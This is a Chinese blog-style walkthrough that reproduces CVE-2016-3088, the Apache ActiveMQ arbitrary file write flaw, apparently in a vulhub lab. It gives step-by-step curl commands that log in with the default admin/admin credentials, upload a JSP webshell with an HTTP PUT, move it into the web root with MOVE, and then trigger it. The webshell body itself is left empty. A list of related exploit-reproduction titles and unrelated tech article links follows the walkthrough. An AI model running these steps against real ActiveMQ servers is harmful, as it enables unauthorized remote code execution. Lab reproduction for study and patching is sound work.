本文采用写入webshell的方式复现

终端进入CVE-2016-3088目录

touch shell.jsp创建测试文件往里写入:



保存退出

访问 http://your-ip:8161/admin/test/systemProperties.jsp获取 ActiveMQ 绝对路径

(默认账密admin/admin)

在页面中查看 ActiveMQ 的安装路径(如/opt/activemq)

发送PUT请求上传webshell文件(最开始创建的shell.jsp文件)

curl -X PUT -H "Content-Length: $(wc -c < shell.jsp)" http://192.168.75.132:8161/fileserver/2.txt --data-binary @shell.jsp



PS:

-X PUT:指定 HTTP 方法为 PUT

-H "Content-Length: ...":自动计算文件长度(wc -c < shell.jsp获取字节数)

--data-binary @shell.jsp:读取本地shell.jsp文件内容作为请求体

发送MOVE请求移动文件

curl -X MOVE -H "Destination: file:///opt/activemq/webapps/api/s.jsp" http://192.168.75.132:8161/fileserver/2.txt

最后访问 http://your-ip:8161/api/s.jsp 即可触发 webshell(需管理员权限登录admin/admin

CVE-2016-3088 (ActiveMQ任意文件写入漏洞) 复现的更多相关文章

  1. ActiveMQ任意文件写入漏洞(版本在5.12.X前CVE-2016-3088)

    ActiveMQ任意文件写入漏洞(版本在5.12.X前CVE-2016-3088) 查看docker的activemq版本命令:$ docker ps | grep activemq927860512 ...

  2. Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

    Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现 一.漏洞描述 该漏洞出现在fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务允许用户通 ...

  3. 漏洞复现-ActiveMq任意文件写入漏洞(CVE-2016-3088)

          0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 未禁用PUT.MOVE等高危方法的ActiveM ...

  4. ActiveMQ任意文件写入漏洞(CVE-2016-3088)

    上传webshell 容器用vulhub的 PUT一个jsp文件 MOVE到api目录 默认的ActiveMQ账号密码均为admin,首先访问http://your-ip:8161/admin/tes ...

  5. ActiveMQ反序列化(CVE-2015-5254) && ActiveMQ任意文件写入 (CVE-2016-3088)

    ActiveMQ 反序列化漏洞(CVE-2015-5254) 漏洞详情 ActiveMQ启动后,将监听61616和8161两个端口,其中消息在61616这个端口进行传递,使用ActiveMQ这个中间件 ...

  6. 致远A8任意文件写入漏洞_getshell_exp

    近期爆出致远 OA 系统的一些版本存在任意文件写入漏洞,远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任 ...

  7. Aria2任意文件写入漏洞

    目录: 简介 漏洞描述 payload 漏洞复现 一.Aria2介绍 Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP / HTTPS,FTP,BitTorrent,Metalink), ...

  8. Discuz!X 3.4 前台任意文件删除漏洞复现

    Discuz!X 3.4 前台任意文件删除漏洞复现 参考链接: http://www.freebuf.com/vuls/149904.html http://www.freebuf.com/artic ...

  9. Discuz!X 3.4 任意文件删除漏洞复现过程(附python脚本)

    今天看下群里在讨论Discuz!X 3.4 任意文件删除漏洞,自己做了一些测试,记录一下过程.结尾附上自己编写的python脚本,自动化实现任意文件删除. 具体漏洞,请查看 https://paper ...

  10. Wordpress4.9.6 任意文件删除漏洞复现分析

    第一章 漏洞简介及危害分析 1.1漏洞介绍 WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量.它是一个开 ...

随机推荐

  1. Web前端入门第 49 问:CSS offset 路径动画演示

    什么是路径动画? 随手画一条不规则的线,让元素按照这条不规则的线运动起来,这就是所谓的路径动画. 前面说过的动画都只能针对某一个 CSS 属性,要想实现路径动画可没办法,路径动画必须借助 CSS3 的 ...

  2. 从一个例子看tvm执行流程

    TVM整体流程(参考:TVM介绍) 机器学习模型在用TVM优化编译器框架进行变换时的步骤: 从Tensorflow/pytorch或ONNX等框架导入模型 import层是TVM从其他框架中导入模型的 ...

  3. String Manipulation related with pandas

    String Manipulation related with pandas String object Methods import pandas as pd import numpy as np ...

  4. 修改Tomcat默认端口方法

    找到Tomcat的配置文件conf目录下的server 例如我的具体地址:C:\moliy\code\resourse\apache-tomcat-9.0.13-windows-x64\apache- ...

  5. 秒杀/高并发解决方案+落地实现 (技术栈: SpringBoot+Mysql + Redis +RabbitMQ +MyBatis-Plus +Maven + Linux + Jmeter )-01

    秒杀/高并发方案-介绍 @ 目录 秒杀/高并发方案-介绍 秒杀/高并发解决方案+落地实现 (技术栈: SpringBoot+Mysql + Redis +RabbitMQ +MyBatis-Plus ...

  6. K8s集群中的DNS服务(CoreDNS)详解

    概述 官网文档:https://kubernetes.io/zh-cn/docs/concepts/services-networking/dns-pod-service/ 在 Kubernetes( ...

  7. CF contest 1909 Pinely Round 3 (Div. 1 + Div. 2) 题解(Vanilla的掉分赛)

    CF contest 1909 Pinely Round 3 (Div. 1 + Div. 2) Vanilla的掉分赛 绪言 Pinely Round 3 (Div. 1 + Div. 2) - C ...

  8. FPGA使用两个HC595驱动8位数码管

    FPGA使用两个HC595驱动8位数码管 本文章给出使用FPGA3根线来驱动8位数码管的示例代码,输入为disp_data,共7*8=56位,输出输入如图所示. 硬件方面参数 该程序只能控制数码管的7 ...

  9. 2025年最值得关注的效率神器排行榜,HR和运营人都在偷偷用

    在职场节奏越来越快的当下,效率工具已经成为打工人提升工作表现的"刚需".无论你是HR.运营.市场.产品经理,还是独立工作者,选对一款好用的效率神器,往往能省下大量时间.提升工作成就 ...

  10. ceph对象存储

    一.Ceph对象存储的概念 ceph是一种分布式对象存储系统,通过ceph对象网关提供对象存储接口,也称为RADOS网关(RGW)接口.它构建在Ceph RADOS之上.RGW使用librgw(RAD ...